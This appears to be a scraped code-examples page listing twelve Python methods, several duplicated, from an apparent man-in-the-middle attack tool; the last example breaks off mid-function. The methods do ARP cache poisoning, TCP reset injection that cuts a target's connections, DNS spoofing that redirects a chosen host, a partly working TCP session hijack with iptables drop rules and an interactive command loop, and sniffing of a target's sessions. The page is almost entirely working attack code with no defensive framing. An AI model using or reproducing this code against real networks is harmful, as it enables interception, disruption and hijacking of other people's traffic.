Exemple #1
0
    def poison(self, delay, target_b=None):
        """
        poison arp cache of target and router, causing all traffic between them to
        pass inside our machine, MITM heart
        """
        if not target_b:
            target_b = self.gateway
        utils.set_ip_forward(1)
        sock = socket(PF_PACKET, SOCK_RAW)
        sock.bind((self.dev, dpkt.ethernet.ETH_TYPE_ARP))
        try:
            while True:
                if self.debug:
                    log.info('[+] %s <-- %s -- %s -- %s --> %s',
                             target_b, self.target, self.dev, target_b, self.target)
                    if not isinstance(self.target, list):
                        sock.send(str(utils.build_arp_packet(
                            self.src_mac, target_b, self.target)))
                        sock.send(str(utils.build_arp_packet(
                            self.src_mac, self.target, target_b)))
                        time.sleep(delay) # OS refresh ARP cache really often
                    else:
                        for addr in self.target:
                            sock.send(str(utils.build_arp_packet(self.src_mac, target_b, addr)))
                            sock.send(str(utils.build_arp_packet(self.src_mac, addr, target_b)))
                        time.sleep(delay) # OS refresh ARP cache really often

        except KeyboardInterrupt:
            print('\n\r[+] Poisoning interrupted')
            sock.close()
Exemple #2
0
    def poison(self, delay, target_b=None):
        """
        poison arp cache of target and router, causing all traffic between them to
        pass inside our machine, MITM heart
        """
        if not target_b:
            target_b = self.gateway
        utils.set_ip_forward(1)
        sock = socket(PF_PACKET, SOCK_RAW)
        sock.bind((self.dev, dpkt.ethernet.ETH_TYPE_ARP))
        try:
            while True:
                if self.debug:
                    log.info('[+] %s <-- %s -- %s -- %s --> %s',
                             target_b, self.target, self.dev, target_b, self.target)
                    if not isinstance(self.target, list):
                        sock.send(str(utils.build_arp_packet(
                            self.src_mac, target_b, self.target)))
                        sock.send(str(utils.build_arp_packet(
                            self.src_mac, self.target, target_b)))
                        time.sleep(delay) # OS refresh ARP cache really often
                    else:
                        for addr in self.target:
                            sock.send(str(utils.build_arp_packet(self.src_mac, target_b, addr)))
                            sock.send(str(utils.build_arp_packet(self.src_mac, addr, target_b)))
                        time.sleep(delay) # OS refresh ARP cache really often

        except KeyboardInterrupt:
            print('\n\r[+] Poisoning interrupted')
            sock.close()
Exemple #3
0
    def rst_inject(self, port=None):
        """
        injecting RESET packets to the target machine eventually blocking his
        connection and navigation
        """
        sock = socket(PF_PACKET, SOCK_RAW)
        sock.bind((self.dev, dpkt.ethernet.ETH_TYPE_ARP))
        pcap_filter = self._build_pcap_filter("ip host ", port)

        # need to create a daemon that continually poison our target
        poison_thread = Thread(target=self.poison, args=(2, ))
        poison_thread.daemon = True
        poison_thread.start()
        # start capturing packets
        packets = pcap.pcap(self.dev)
        packets.setfilter(pcap_filter)  # we need only target packets

        print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G +
              self.gateway + W + ' and ' + R +
              (','.join(self.target) if isinstance(self.target, list
                                                   ) else self.target) + W +
              '\n')

        if port:
            print('[+] Sending RST packets to ' + R +
                  (','.join(self.target) if isinstance(self.target, list
                                                       ) else self.target) +
                  W + ' on port ' + R + port + W)
        else:
            print('[+] Sending RST packets to ' + R +
                  (','.join(self.target) if isinstance(self.target, list
                                                       ) else self.target) + W)

        if self.verbose:
            print('[+] Every dot symbolize a sent packet')

        counter = 0
        try:
            for _, pkt in packets:
                eth = dpkt.ethernet.Ethernet(pkt)
                ip_packet = eth.data
                if ip_packet.p == dpkt.ip.IP_PROTO_TCP:
                    tcp = ip_packet.data
                    if tcp.flags != dpkt.tcp.TH_RST:
                        # build tcp layer
                        tcp_layer = dpkt.tcp.TCP(sport=tcp.sport,
                                                 dport=tcp.dport,
                                                 seq=tcp.seq + len(tcp.data),
                                                 ack=0,
                                                 off_x2=0x50,
                                                 flags=dpkt.tcp.TH_RST,
                                                 win=tcp.win,
                                                 sum=0,
                                                 urp=0)
                        # build ip layer
                        ip_layer = dpkt.ip.IP(hl=ip_packet.hl,
                                              tos=ip_packet.tos,
                                              len=40,
                                              id=ip_packet.id + 1,
                                              off=0x4000,
                                              ttl=128,
                                              p=ip_packet.p,
                                              sum=0,
                                              src=ip_packet.src,
                                              dst=ip_packet.dst,
                                              data=tcp_layer)
                        # build ethernet layer
                        eth_layer = dpkt.ethernet.Ethernet(dst=eth.dst,
                                                           src=eth.src,
                                                           type=eth.type,
                                                           data=ip_layer)

                        sock.send(str(eth_layer))

                        if self.verbose:
                            utils.print_in_line('.')
                        else:
                            utils.print_counter(counter)

                        # rebuild layers
                        ip_packet.src, ip_packet.dst = ip_packet.dst, ip_packet.src
                        tcp_layer.sport, tcp_layer.dport = tcp.dport, tcp.sport
                        tcp_layer.ack, tcp_layer.seq = tcp.seq + len(
                            tcp.data), tcp.ack
                        eth_layer.src, eth_layer.dst = eth.dst, eth.src

                        sock.send(str(eth_layer))

                        if self.verbose:
                            utils.print_in_line('.')
                        else:
                            utils.print_counter(counter)
                            counter += 1

        except KeyboardInterrupt:
            print('[+] Rst injection interrupted\n\r')
            sock.close()
            self.restore(2)
            utils.set_ip_forward(0)
Exemple #4
0
    def dns_spoof(self, host=None, redirection=None):
        """
        Redirect all incoming request for 'host' to 'redirection'
        """
        pcap_filter = self._build_pcap_filter('udp dst port 53 and src ')
        redirection = gethostbyname(redirection)

        print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G +
              self.gateway + W + ' and ' + R +
              (','.join(self.target) if isinstance(self.target, list
                                                   ) else self.target) + W +
              '\n')
        # need to create a daemon that continually poison our target
        poison_thread = Thread(target=self.poison, args=(2, ))
        poison_thread.daemon = True
        poison_thread.start()

        packets = pcap.pcap(self.dev)
        packets.setfilter(pcap_filter)

        sock = socket(PF_PACKET, SOCK_RAW)
        sock.bind((self.dev, dpkt.ethernet.ETH_TYPE_ARP))

        print('[+] Redirecting ' + G + host + W + ' to ' + G + redirection +
              W + ' for ' + R +
              (','.join(self.target) if isinstance(self.target, list
                                                   ) else self.target) + W)

        try:
            for _, pkt in packets:
                eth = dpkt.ethernet.Ethernet(pkt)
                ip_packet = eth.data
                udp = ip_packet.data
                dns = dpkt.dns.DNS(udp.data)
                # validate query
                if dns.qr != dpkt.dns.DNS_Q:
                    continue
                if dns.opcode != dpkt.dns.DNS_QUERY:
                    continue
                if len(dns.qd) != 1:
                    continue
                if len(dns.an) != 0:
                    continue
                if len(dns.ns) != 0:
                    continue
                if dns.qd[0].cls != dpkt.dns.DNS_IN:
                    continue
                if dns.qd[0].type != dpkt.dns.DNS_A:
                    continue
                # spoof for our target name
                if dns.qd[0].name != host:
                    continue
                # send spoofed answer
                send(
                    IP(src=inet_ntoa(ip_packet.dst),
                       dst=inet_ntoa(ip_packet.src)) /
                    UDP(sport=udp.dport, dport=udp.sport) /
                    DNS(opcode=dpkt.dns.DNS_RA,
                        rcode=dpkt.dns.DNS_RCODE_NOERR,
                        qr=dpkt.dns.DNS_R,
                        an=DNSRR(rrname=host,
                                 type=dpkt.dns.DNS_A,
                                 rclass=dpkt.dns.DNS_IN,
                                 rdata=redirection)))
                # dns query->response
                # dns.op = dpkt.dns.DNS_RA
                # dns.rcode = dpkt.dns.DNS_RCODE_NOERR
                # dns.qr = dpkt.dns.DNS_R
                #
                # # construct fake answer
                # arr = dpkt.dns.DNS.RR()
                # arr.cls, arr.type, arr.name = dpkt.dns.DNS_IN, dpkt.dns.DNS_A, host
                # # arr.ip = dnet.addr(redirection).ip
                # arr.ip = socket.inet_aton(redirection)
                #
                # dns.an.append(arr)
                #
                # udp.sport, udp.dport = udp.dport, udp.sport
                # ip_packet.src, ip_packet.dst = ip_packet.dst, ip_packet.src
                # udp.data, udp.ulen = dns, len(udp)
                # ip_packet.len = len(ip_packet)
                #
                #
                # sock.send(str(ip_packet))

                print(inet_ntoa(ip_packet.dst))

        except KeyboardInterrupt:
            print('[+] DNS spoofing interrupted\n\r')
            self.restore(2)
            utils.set_ip_forward(0)
Exemple #5
0
    def hijack_session(self, target_b=None):
        """
        !! Still bugged, doesn't work properly !!
        Try to hijack a TCP sessions between two local address
        """
        if not target_b:
            target_b = self.gateway
        print(
            '[+] Sessions between {}{}{} and {}{}{} will be listed soon,\n'
            '    just type the number of session to hijack and ENTER\n'.format(
                G, self.target, W, G, target_b, W))
        stop_thread = False
        list_conn_thread = Thread(target=self.list_sessions,
                                  args=(
                                      lambda: stop_thread,
                                      target_b,
                                  ))
        list_conn_thread.start()
        choice = None
        sock = socket(PF_PACKET, SOCK_RAW)
        sock.bind((self.dev, dpkt.ethernet.ETH_TYPE_ARP))
        while True:
            choice = raw_input()
            choice = int(choice) - 1
            if choice <= len(self.sessions) and choice > -1:
                break
        # must stop thread
        stop_thread = True
        list_conn_thread.join()
        src_ip, src_port, dst_ip, dst_port = re.search(
            r'^([0-9.]+):(\d+)\s+<->\s+([0-9.]+):(\d+)$',
            self.sessions[choice]).groups()
        str_src_ip, str_src_port, str_dst_ip, str_dst_port = src_ip, src_port, dst_ip, dst_port
        print('\n[*] Trying an hijack for: {}:{} --> {}:{}'.format(
            src_ip, src_port, dst_ip, dst_port))
        print(
            '\n[*] Waiting for another packet in order to get a seq and a ack number'
        )
        pcap_filter = 'src host %s and src port %s and dst host %s and dst port %s and tcp' % (
            src_ip, src_port, dst_ip, dst_port)
        packets = pcap.pcap(self.dev)
        packets.setfilter(pcap_filter)
        eth = None
        for _, pkt in packets:
            eth = dpkt.ethernet.Ethernet(pkt)
            ip_packet = eth.data
            tcp = ip_packet.data
            if ip_packet.src == dst_ip:
                src_port, dst_port = tcp.dport, tcp.sport
            else:
                src_port, dst_port = tcp.sport, tcp.dport
            seq, ack, data = tcp.seq, tcp.ack, tcp.data
            print('[*] Packet captured => SEQ: {}, ACK: {}'.format(seq, ack))
            seq += len(data)
            print(
                '[*] Sending 1024 bytes nop payload to trying a desynchronization.\n'
            )
            tcp_layer = dpkt.tcp.TCP(sport=src_port,
                                     dport=dst_port,
                                     seq=seq,
                                     ack=ack,
                                     data='\x00' * 1024)
            # build ip layer
            ip_layer = dpkt.ip.IP(src=src_ip, dst=dst_ip, data=tcp_layer)
            # build ethernet layer
            eth_layer = dpkt.ethernet.Ethernet(dst=eth.dst,
                                               src=eth.src,
                                               type=eth.type,
                                               data=ip_layer)

            sock.send(str(eth_layer))
            seq += 1024
            print('[*] Desynchronization complete.')
            break

        def response_to(ack):
            """Daemon function used to intercept responses from the hijacked session"""
            pcap_filter = 'src host %s and src port %s and dst host %s and dst port %s and tcp' % (
                str_dst_ip, str_dst_port, str_src_ip, str_src_port)
            sock = socket(PF_PACKET, SOCK_RAW)
            sock.bind((self.dev, dpkt.ethernet.ETH_TYPE_ARP))
            packets = pcap.pcap(self.dev)
            packets.setfilter(pcap_filter)
            eth = None
            for _, pkt in packets:
                eth = dpkt.ethernet.Ethernet(pkt)
                ip_packet = eth.data
                tcp = ip_packet.data
                if tcp.seq == ack:
                    seq = tcp.ack
                    if len(tcp.data) > 0:
                        ack += len(tcp.data)
                        tcp_layer = dpkt.tcp.TCP(sport=src_port,
                                                 dport=dst_port,
                                                 seq=seq,
                                                 ack=ack)
                        # build ip layer
                        ip_layer = dpkt.ip.IP(src=src_ip,
                                              dst=dst_ip,
                                              data=tcp_layer)
                        # build ethernet layer
                        eth_layer = dpkt.ethernet.Ethernet(dst=eth.dst,
                                                           src=eth.src,
                                                           type=eth.type,
                                                           data=ip_layer)

                        sock.send(str(eth_layer))
                        sys.stdout.write(tcp.data)

        # start a thread to handle responses to the hijacked session
        tcpdaemon_thread = Thread(target=response_to, args=(ack, ))
        tcpdaemon_thread.daemon = True
        tcpdaemon_thread.start()
        os.system('/sbin/iptables -A FORWARD -s %s -p tcp --sport %s -j DROP' %
                  (str_src_ip, str_src_port))
        os.system('/sbin/iptables -A FORWARD -d %s -p tcp --dport %s -j DROP' %
                  (str_src_ip, str_src_port))
        print(
            '[*] Session hijacked, everything entered now should be sent through it.'
        )

        # start a command loop to send instruction to the hijacked session
        try:
            while True:
                data = raw_input('> ')
                tcp_layer = dpkt.tcp.TCP(sport=src_port,
                                         dport=dst_port,
                                         seq=seq,
                                         ack=1,
                                         data=data)
                # build ip layer
                ip_layer = dpkt.ip.IP(src=src_ip, dst=dst_ip, data=tcp_layer)
                # build ethernet layer
                eth_layer = dpkt.ethernet.Ethernet(dst=eth.dst,
                                                   src=eth.src,
                                                   type=eth.type,
                                                   data=ip_layer)

                sock.send(str(eth_layer))
                seq += len(data)
        except KeyboardInterrupt:
            print('[+] Session hijacking interrupted\n\r')
            self.restore(2)
            utils.set_ip_forward(0)
Exemple #6
0
    def dns_spoof(self, host=None, redirection=None):
        """
        Redirect all incoming request for 'host' to 'redirection'
        """
        pcap_filter = self._build_pcap_filter('udp dst port 53 and src ')
        redirection = gethostbyname(redirection)
        sock = dnet.ip()

        print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G +
              self.gateway + W + ' and ' + R +
              (','.join(self.target) if isinstance(self.target, list
                                                   ) else self.target) + W +
              '\n')
        # need to create a daemon that continually poison our target
        poison_thread = Thread(target=self.poison, args=(2, ))
        poison_thread.daemon = True
        poison_thread.start()

        packets = pcap.pcap(self.dev)
        packets.setfilter(pcap_filter)

        print('[+] Redirecting ' + G + host + W + ' to ' + G + redirection +
              W + ' for ' + R +
              (','.join(self.target) if isinstance(self.target, list
                                                   ) else self.target) + W)

        try:
            for _, pkt in packets:
                eth = dpkt.ethernet.Ethernet(pkt)
                ip_packet = eth.data
                udp = ip_packet.data
                dns = dpkt.dns.DNS(udp.data)
                # validate query
                if dns.qr != dpkt.dns.DNS_Q:
                    continue
                if dns.opcode != dpkt.dns.DNS_QUERY:
                    continue
                if len(dns.qd) != 1:
                    continue
                if len(dns.an) != 0:
                    continue
                if len(dns.ns) != 0:
                    continue
                if dns.qd[0].cls != dpkt.dns.DNS_IN:
                    continue
                if dns.qd[0].type != dpkt.dns.DNS_A:
                    continue
                # spoof for our target name
                if dns.qd[0].name != host:
                    continue

                # dns query->response
                dns.op = dpkt.dns.DNS_RA
                dns.rcode = dpkt.dns.DNS_RCODE_NOERR
                dns.qr = dpkt.dns.DNS_R

                # construct fake answer
                arr = dpkt.dns.DNS.RR()
                arr.cls, arr.type, arr.name = dpkt.dns.DNS_IN, dpkt.dns.DNS_A, host
                arr.ip = dnet.addr(redirection).ip

                dns.an.append(arr)

                udp.sport, udp.dport = udp.dport, udp.sport
                ip_packet.src, ip_packet.dst = ip_packet.dst, ip_packet.src
                udp.data, udp.ulen = dns, len(udp)
                ip_packet.len = len(ip_packet)

                print(inet_ntoa(ip_packet.src))

                buf = dnet.ip_checksum(str(ip_packet))
                sock.send(buf)

        except KeyboardInterrupt:
            print('[+] DNS spoofing interrupted\n\r')
            self.restore(2)
            utils.set_ip_forward(0)
Exemple #7
0
    def list_sessions(self, stop, target_b=None, port=None):
        """
        Try to get all TCP sessions of the target
        """
        notorious_services = {
            20: ' ftp-data session',
            21: ' ftp-data session',
            22: ' ssh session',
            23: ' telnet session',
            25: ' SMTP session',
            80: ' HTTP session',
            110: ' POP3 session',
            143: ' IMAP session',
            194: ' IRC session',
            220: ' IMAPv3 session',
            443: ' SSL session',
            445: ' SAMBA session',
            989: ' FTPS session',
            990: ' FTPS session',
            992: ' telnet SSL session',
            993: ' IMAP SSL session',
            994: ' IRC SSL session'
        }

        source = utils.get_default_gateway_linux()
        if target_b and target_b != self.gateway:
            source = utils.get_mac_by_ip(target_b)
        pcap_filter = self._build_pcap_filter("ip host ", port)
        packets = pcap.pcap(self.dev)
        packets.setfilter(pcap_filter)  # we need only self.target packets
        # need to create a daemon that continually poison our target
        poison_thread = Thread(target=self.poison, args=(
            2,
            target_b,
        ))
        poison_thread.daemon = True
        poison_thread.start()
        print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G +
              source + W + ' and ' + R + (','.join(self.target) if isinstance(
                  self.target, list) else self.target) + W + '\n')
        sessions = {}
        try:
            for _, pkt in packets:
                if stop():
                    break
                eth = dpkt.ethernet.Ethernet(pkt)
                ip_packet = eth.data
                if ip_packet.p == dpkt.ip.IP_PROTO_TCP:
                    tcp = ip_packet.data
                    if tcp.flags != dpkt.tcp.TH_RST:
                        sess = "%-25s <-> %25s" % (
                            inet_ntoa(ip_packet.src) + ":" + str(tcp.sport),
                            inet_ntoa(ip_packet.dst) + ":" + str(tcp.dport))
                        check = False
                        if sess not in sessions:
                            check = True

                        sessions[sess] = "Others"

                        if tcp.sport in notorious_services:
                            sessions[sess] = notorious_services[tcp.sport]
                        elif tcp.dport in notorious_services:
                            sessions[sess] = notorious_services[tcp.dport]

                        if check is True:
                            print(" [{:^5}] {} : {}".format(
                                len(sessions), sess, sessions[sess]))
                            self.sessions.append(sess)

        except KeyboardInterrupt:
            print('[+] Session scan interrupted\n\r')
            self.restore(2)
            utils.set_ip_forward(0)
Exemple #8
0
    def rst_inject(self, port=None):
        """
        injecting RESET packets to the target machine eventually blocking his
        connection and navigation
        """
        sock = socket(PF_PACKET, SOCK_RAW)
        sock.bind((self.dev, dpkt.ethernet.ETH_TYPE_ARP))
        pcap_filter = self._build_pcap_filter("ip host ", port)

        # need to create a daemon that continually poison our target
        poison_thread = Thread(target=self.poison, args=(2,))
        poison_thread.daemon = True
        poison_thread.start()
        # start capturing packets
        packets = pcap.pcap(self.dev)
        packets.setfilter(pcap_filter) # we need only target packets

        print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G + self.gateway + W
              + ' and ' + R
              + (','.join(self.target) if isinstance(self.target, list) else self.target) + W +'\n')

        if port:
            print('[+] Sending RST packets to ' + R
                  + (','.join(self.target) if isinstance(self.target, list) else self.target)
                  + W + ' on port ' + R + port + W)
        else:
            print('[+] Sending RST packets to ' + R
                  + (','.join(self.target) if isinstance(self.target, list) else self.target) + W)

        if self.verbose:
            print('[+] Every dot symbolize a sent packet')

        counter = 0
        try:
            for _, pkt in packets:
                eth = dpkt.ethernet.Ethernet(pkt)
                ip_packet = eth.data
                if ip_packet.p == dpkt.ip.IP_PROTO_TCP:
                    tcp = ip_packet.data
                    if tcp.flags != dpkt.tcp.TH_RST:
                        # build tcp layer
                        tcp_layer = dpkt.tcp.TCP(
                            sport=tcp.sport,
                            dport=tcp.dport,
                            seq=tcp.seq + len(tcp.data),
                            ack=0,
                            off_x2=0x50,
                            flags=dpkt.tcp.TH_RST,
                            win=tcp.win,
                            sum=0,
                            urp=0)
                        # build ip layer
                        ip_layer = dpkt.ip.IP(
                            hl=ip_packet.hl,
                            tos=ip_packet.tos,
                            len=40,
                            id=ip_packet.id + 1,
                            off=0x4000,
                            ttl=128,
                            p=ip_packet.p,
                            sum=0,
                            src=ip_packet.src,
                            dst=ip_packet.dst,
                            data=tcp_layer)
                        # build ethernet layer
                        eth_layer = dpkt.ethernet.Ethernet(
                            dst=eth.dst,
                            src=eth.src,
                            type=eth.type,
                            data=ip_layer)

                        sock.send(str(eth_layer))

                        if self.verbose:
                            utils.print_in_line('.')
                        else:
                            utils.print_counter(counter)

                        # rebuild layers
                        ip_packet.src, ip_packet.dst = ip_packet.dst, ip_packet.src
                        tcp_layer.sport, tcp_layer.dport = tcp.dport, tcp.sport
                        tcp_layer.ack, tcp_layer.seq = tcp.seq + len(tcp.data), tcp.ack
                        eth_layer.src, eth_layer.dst = eth.dst, eth.src

                        sock.send(str(eth_layer))

                        if self.verbose:
                            utils.print_in_line('.')
                        else:
                            utils.print_counter(counter)
                            counter += 1

        except KeyboardInterrupt:
            print('[+] Rst injection interrupted\n\r')
            sock.close()
            self.restore(2)
            utils.set_ip_forward(0)
Exemple #9
0
    def dns_spoof(self, host=None, redirection=None):
        """
        Redirect all incoming request for 'host' to 'redirection'
        """
        pcap_filter = self._build_pcap_filter('udp dst port 53 and src ')
        redirection = gethostbyname(redirection)

        print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G + self.gateway + W
              + ' and ' + R
              + (','.join(self.target) if isinstance(self.target, list) else self.target) + W +'\n')
        # need to create a daemon that continually poison our target
        poison_thread = Thread(target=self.poison, args=(2, ))
        poison_thread.daemon = True
        poison_thread.start()

        packets = pcap.pcap(self.dev)
        packets.setfilter(pcap_filter)

        sock = socket(PF_PACKET, SOCK_RAW)
        sock.bind((self.dev, dpkt.ethernet.ETH_TYPE_ARP))

        print('[+] Redirecting ' + G + host + W + ' to ' + G + redirection + W + ' for ' + R
              + (','.join(self.target) if isinstance(self.target, list) else self.target) + W)

        try:
            for _, pkt in packets:
                eth = dpkt.ethernet.Ethernet(pkt)
                ip_packet = eth.data
                udp = ip_packet.data
                dns = dpkt.dns.DNS(udp.data)
                # validate query
                if dns.qr != dpkt.dns.DNS_Q:
                    continue
                if dns.opcode != dpkt.dns.DNS_QUERY:
                    continue
                if len(dns.qd) != 1:
                    continue
                if len(dns.an) != 0:
                    continue
                if len(dns.ns) != 0:
                    continue
                if dns.qd[0].cls != dpkt.dns.DNS_IN:
                    continue
                if dns.qd[0].type != dpkt.dns.DNS_A:
                    continue
                # spoof for our target name
                if dns.qd[0].name != host:
                    continue
                # send spoofed answer
                send(IP(src=inet_ntoa(ip_packet.dst), dst=inet_ntoa(ip_packet.src))/
                     UDP(sport=udp.dport, dport=udp.sport)/
                     DNS(opcode=dpkt.dns.DNS_RA, rcode=dpkt.dns.DNS_RCODE_NOERR,
                         qr=dpkt.dns.DNS_R, an=DNSRR(rrname=host, type=dpkt.dns.DNS_A,
                                                     rclass=dpkt.dns.DNS_IN,
                                                     rdata=redirection)))
                # dns query->response
                # dns.op = dpkt.dns.DNS_RA
                # dns.rcode = dpkt.dns.DNS_RCODE_NOERR
                # dns.qr = dpkt.dns.DNS_R
                #
                # # construct fake answer
                # arr = dpkt.dns.DNS.RR()
                # arr.cls, arr.type, arr.name = dpkt.dns.DNS_IN, dpkt.dns.DNS_A, host
                # # arr.ip = dnet.addr(redirection).ip
                # arr.ip = socket.inet_aton(redirection)
                #
                # dns.an.append(arr)
                #
                # udp.sport, udp.dport = udp.dport, udp.sport
                # ip_packet.src, ip_packet.dst = ip_packet.dst, ip_packet.src
                # udp.data, udp.ulen = dns, len(udp)
                # ip_packet.len = len(ip_packet)
                #
                #
                # sock.send(str(ip_packet))

                print(inet_ntoa(ip_packet.dst))

        except KeyboardInterrupt:
            print('[+] DNS spoofing interrupted\n\r')
            self.restore(2)
            utils.set_ip_forward(0)
Exemple #10
0
    def hijack_session(self, target_b=None):
        """
        !! Still bugged, doesn't work properly !!
        Try to hijack a TCP sessions between two local address
        """
        if not target_b:
            target_b = self.gateway
        print('[+] Sessions between {}{}{} and {}{}{} will be listed soon,\n'
              '    just type the number of session to hijack and ENTER\n'.format(G, self.target,
                                                                                 W, G, target_b, W))
        stop_thread = False
        list_conn_thread = Thread(target=self.list_sessions, args=(lambda: stop_thread, target_b, ))
        list_conn_thread.start()
        choice = None
        sock = socket(PF_PACKET, SOCK_RAW)
        sock.bind((self.dev, dpkt.ethernet.ETH_TYPE_ARP))
        while True:
            choice = raw_input()
            choice = int(choice) - 1
            if choice <= len(self.sessions) and choice > -1:
                break
        # must stop thread
        stop_thread = True
        list_conn_thread.join()
        src_ip, src_port, dst_ip, dst_port = re.search(r'^([0-9.]+):(\d+)\s+<->\s+([0-9.]+):(\d+)$',
                                                       self.sessions[choice]).groups()
        str_src_ip, str_src_port, str_dst_ip, str_dst_port = src_ip, src_port, dst_ip, dst_port
        print('\n[*] Trying an hijack for: {}:{} --> {}:{}'.format(src_ip,
                                                                   src_port, dst_ip, dst_port))
        print('\n[*] Waiting for another packet in order to get a seq and a ack number')
        pcap_filter = 'src host %s and src port %s and dst host %s and dst port %s and tcp' % (src_ip, src_port, dst_ip, dst_port)
        packets = pcap.pcap(self.dev)
        packets.setfilter(pcap_filter)
        eth = None
        for _, pkt in packets:
            eth = dpkt.ethernet.Ethernet(pkt)
            ip_packet = eth.data
            tcp = ip_packet.data
            if ip_packet.src == dst_ip:
                src_port, dst_port = tcp.dport, tcp.sport
            else:
                src_port, dst_port = tcp.sport, tcp.dport
            seq, ack, data = tcp.seq, tcp.ack, tcp.data
            print('[*] Packet captured => SEQ: {}, ACK: {}'.format(seq, ack))
            seq += len(data)
            print('[*] Sending 1024 bytes nop payload to trying a desynchronization.\n')
            tcp_layer = dpkt.tcp.TCP(
                sport=src_port,
                dport=dst_port,
                seq=seq,
                ack=ack,
                data='\x00' * 1024)
            # build ip layer
            ip_layer = dpkt.ip.IP(
                src=src_ip,
                dst=dst_ip,
                data=tcp_layer)
            # build ethernet layer
            eth_layer = dpkt.ethernet.Ethernet(
                dst=eth.dst,
                src=eth.src,
                type=eth.type,
                data=ip_layer)

            sock.send(str(eth_layer))
            seq += 1024
            print('[*] Desynchronization complete.')
            break

        def response_to(ack):
            """Daemon function used to intercept responses from the hijacked session"""
            pcap_filter = 'src host %s and src port %s and dst host %s and dst port %s and tcp' % (str_dst_ip, str_dst_port, str_src_ip, str_src_port)
            sock = socket(PF_PACKET, SOCK_RAW)
            sock.bind((self.dev, dpkt.ethernet.ETH_TYPE_ARP))
            packets = pcap.pcap(self.dev)
            packets.setfilter(pcap_filter)
            eth = None
            for _, pkt in packets:
                eth = dpkt.ethernet.Ethernet(pkt)
                ip_packet = eth.data
                tcp = ip_packet.data
                if tcp.seq == ack:
                    seq = tcp.ack
                    if len(tcp.data) > 0:
                        ack += len(tcp.data)
                        tcp_layer = dpkt.tcp.TCP(
                            sport=src_port,
                            dport=dst_port,
                            seq=seq,
                            ack=ack)
                        # build ip layer
                        ip_layer = dpkt.ip.IP(
                            src=src_ip,
                            dst=dst_ip,
                            data=tcp_layer)
                        # build ethernet layer
                        eth_layer = dpkt.ethernet.Ethernet(
                            dst=eth.dst,
                            src=eth.src,
                            type=eth.type,
                            data=ip_layer)

                        sock.send(str(eth_layer))
                        sys.stdout.write(tcp.data)

        # start a thread to handle responses to the hijacked session
        tcpdaemon_thread = Thread(target=response_to, args=(ack,))
        tcpdaemon_thread.daemon = True
        tcpdaemon_thread.start()
        os.system('/sbin/iptables -A FORWARD -s %s -p tcp --sport %s -j DROP' % (str_src_ip, str_src_port))
        os.system('/sbin/iptables -A FORWARD -d %s -p tcp --dport %s -j DROP' % (str_src_ip, str_src_port))
        print('[*] Session hijacked, everything entered now should be sent through it.')

        # start a command loop to send instruction to the hijacked session
        try:
            while True:
                data = raw_input('> ')
                tcp_layer = dpkt.tcp.TCP(
                    sport=src_port,
                    dport=dst_port,
                    seq=seq,
                    ack=1,
                    data=data)
                # build ip layer
                ip_layer = dpkt.ip.IP(
                    src=src_ip,
                    dst=dst_ip,
                    data=tcp_layer)
                # build ethernet layer
                eth_layer = dpkt.ethernet.Ethernet(
                    dst=eth.dst,
                    src=eth.src,
                    type=eth.type,
                    data=ip_layer)

                sock.send(str(eth_layer))
                seq += len(data)
        except KeyboardInterrupt:
            print('[+] Session hijacking interrupted\n\r')
            self.restore(2)
            utils.set_ip_forward(0)
Exemple #11
0
    def dns_spoof(self, host=None, redirection=None):
        """
        Redirect all incoming request for 'host' to 'redirection'
        """
        pcap_filter = self._build_pcap_filter('udp dst port 53 and src ')
        redirection = gethostbyname(redirection)
        sock = dnet.ip()

        print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G + self.gateway + W
              + ' and ' + R
              + (','.join(self.target) if isinstance(self.target, list) else self.target) + W +'\n')
        # need to create a daemon that continually poison our target
        poison_thread = Thread(target=self.poison, args=(2, ))
        poison_thread.daemon = True
        poison_thread.start()

        packets = pcap.pcap(self.dev)
        packets.setfilter(pcap_filter)

        print('[+] Redirecting ' + G + host + W + ' to ' + G + redirection + W + ' for ' + R
              + (','.join(self.target) if isinstance(self.target, list) else self.target) + W)

        try:
            for _, pkt in packets:
                eth = dpkt.ethernet.Ethernet(pkt)
                ip_packet = eth.data
                udp = ip_packet.data
                dns = dpkt.dns.DNS(udp.data)
                # validate query
                if dns.qr != dpkt.dns.DNS_Q:
                    continue
                if dns.opcode != dpkt.dns.DNS_QUERY:
                    continue
                if len(dns.qd) != 1:
                    continue
                if len(dns.an) != 0:
                    continue
                if len(dns.ns) != 0:
                    continue
                if dns.qd[0].cls != dpkt.dns.DNS_IN:
                    continue
                if dns.qd[0].type != dpkt.dns.DNS_A:
                    continue
                # spoof for our target name
                if dns.qd[0].name != host:
                    continue

                # dns query->response
                dns.op = dpkt.dns.DNS_RA
                dns.rcode = dpkt.dns.DNS_RCODE_NOERR
                dns.qr = dpkt.dns.DNS_R

                # construct fake answer
                arr = dpkt.dns.DNS.RR()
                arr.cls, arr.type, arr.name = dpkt.dns.DNS_IN, dpkt.dns.DNS_A, host
                arr.ip = dnet.addr(redirection).ip

                dns.an.append(arr)

                udp.sport, udp.dport = udp.dport, udp.sport
                ip_packet.src, ip_packet.dst = ip_packet.dst, ip_packet.src
                udp.data, udp.ulen = dns, len(udp)
                ip_packet.len = len(ip_packet)

                print(inet_ntoa(ip_packet.src))

                buf = dnet.ip_checksum(str(ip_packet))
                sock.send(buf)

        except KeyboardInterrupt:
            print('[+] DNS spoofing interrupted\n\r')
            self.restore(2)
            utils.set_ip_forward(0)
Exemple #12
0
    def list_sessions(self, stop, target_b=None, port=None):
        """
        Try to get all TCP sessions of the target
        """
        notorious_services = {
            20: ' ftp-data session',
            21: ' ftp-data session',
            22: ' ssh session',
            23: ' telnet session',
            25: ' SMTP session',
            80: ' HTTP session',
            110: ' POP3 session',
            143: ' IMAP session',
            194: ' IRC session',
            220: ' IMAPv3 session',
            443: ' SSL session',
            445: ' SAMBA session',
            989: ' FTPS session',
            990: ' FTPS session',
            992: ' telnet SSL session',
            993: ' IMAP SSL session',
            994: ' IRC SSL session'
        }

        source = utils.get_default_gateway_linux()
        if target_b and target_b != self.gateway:
            source = utils.get_mac_by_ip(target_b)
        pcap_filter = self._build_pcap_filter("ip host ", port)
        packets = pcap.pcap(self.dev)
        packets.setfilter(pcap_filter) # we need only self.target packets
        # need to create a daemon that continually poison our target
